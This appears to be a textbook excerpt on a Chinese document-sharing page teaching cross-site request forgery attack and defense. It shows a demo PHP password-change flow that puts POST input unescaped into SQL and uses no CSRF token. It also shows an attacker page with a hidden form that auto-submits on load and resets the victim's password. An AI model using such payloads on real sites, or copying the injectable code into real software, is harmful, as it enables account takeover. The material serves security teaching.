版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
第7章Web安全技术编著:
秦燊劳翠金
任务7.3
CSRF漏洞攻击与防御任务7.3CSRF漏洞攻击与防御
诸如修改用户密码、银行帐号转账等关键处理中,会涉及到跨站请求伪造漏洞(Cross-SiteRequestForgeries漏洞),简称CSRF漏洞。针对CSRF漏洞的攻击就是CSRF攻击。
CSRF漏洞会导致遭受的攻击主要有:更改用户密码或邮箱地址、删除用户帐号、使用用户账号购物、使用用户帐号发帖等。预防CSRF漏洞的方法,是在执行关键处理之间,先确认是否用户自愿发起的请求。
一、网页的内容及功能。
首先用户通过的25.htm输入用户名及密码登录,登录成功后进入26.php欢迎页面,在26.php页面中,点击“下一页”,进入27.php密码修改链接页面。1.网站的密码修改链接页面27.php内容如下:<head><metahttp-equiv="Content_Type"content="text/html";charset="utf-8"/></head><body><?phpsession_start();$id=$_SESSION['aa'];if($id==''){ die('请登录');}?>已登录(username:<?phpechohtmlspecialchars($id,ENT_NOQUOTES,'UTF-8');?>)<br><ahref="28.php">修改密码</a></body>网页27.php的显示效果如图7-3-1所示。点击“修改密码”链接后,进入28.php密码修改页面。图7-3-1网站www.上的网页27.php2.网站的密码修改链接页面28.php内容如下:<?phpsession_start();$id=$_SESSION['aa'];if($id==''){ die('请登录');}?>username:<?phpechohtmlspecialchars($id,ENT_NOQUOTES,'UTF-8');?><br>请输入新密码:<br><formaction="29.php"method="POST"> <inputtype="password"name="password"> <inputtype="submit"value="提交修改"></form>网页28.php的显示效果如图7-3-2所示。
用户输入新密码,如“123”,点击“提交修改”按钮后,页面转到进行密码写入数据库的页面29.php。图7-3-2网站www.上的网页28.php3.网站的网页29.php内容如下:<?phpsession_start();$password=$_POST['password'];$username=$_SESSION['aa'];require'conn.php';mysql_query("updateusersetpassword='$password'whereusername='$username'");if(mysql_affected_rows()) echo"密码更改成功!";else echo"密码更新失败!";?>网页28.php的显示效果如图7-3-3所示。图7-3-3网站www.上的网页29.php二、攻击者利用被攻击网页的漏洞,篡改用户密码若用户已经通过的登录页面25.htm成功登录site1,后被诱导访问攻击者网站的页面27.htm,则site1当前用户的密码将会被篡改。1.攻击者网站上,网页27.htm的内容:<iframeheight="160"src="28.php"></iframe>2.攻击者网站上,网页28.php的内容:<bodyonload="document.forms[0].submit()"> <formaction="/29.php"method="POST"> <inputtype="hidden"name="password"value="heike"> </form></body>
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 统编版语文七年级上册(2024)第8课《咏雪》教学设计
- 出版物鉴定管理办法
- 教师招聘考试中学教育理论综合知识题库6含答案
- 《机器学习-Python实战(微课版)》课件 综合案例2 线性回归
- 2024法院离婚起诉协议书范文正版
- 【课件】第四章+光现象+第3节+平面镜成像-人教版物理八年级上册
- 涂饰工程冬季施工方案
- 岗前安全培训试题及答案新
- 公司职工安全培训试题(培优B卷)
- 车间职工安全培训试题带答案(研优卷)
- 【市质检】福州市2024-2025学年高三年级第一次质量检测 英语试卷(含答案)
- NBA球星库里课件
- 2024届高考英语完形填空专题之答题技巧教学设计
- 餐费月结合同范本
- 2016届高考地理第二轮复习教案
- 2024至2030年中国ICT服务行业市场深度调研及前景趋势与投资战略研究报告
- 2024年全国统计师之中级统计师工作实务考试黑金试题(附答案)
- 2024年人教版新教材七年级英语上册Unit 3单词精讲课件
- 京东入职合同范本
- 2023中原银行秋季校园招聘笔试历年典型考题及考点剖析附带答案详解
- 《大风车》幼儿园小学少儿美术教育绘画课件创意教程教案
评论
0/150
提交评论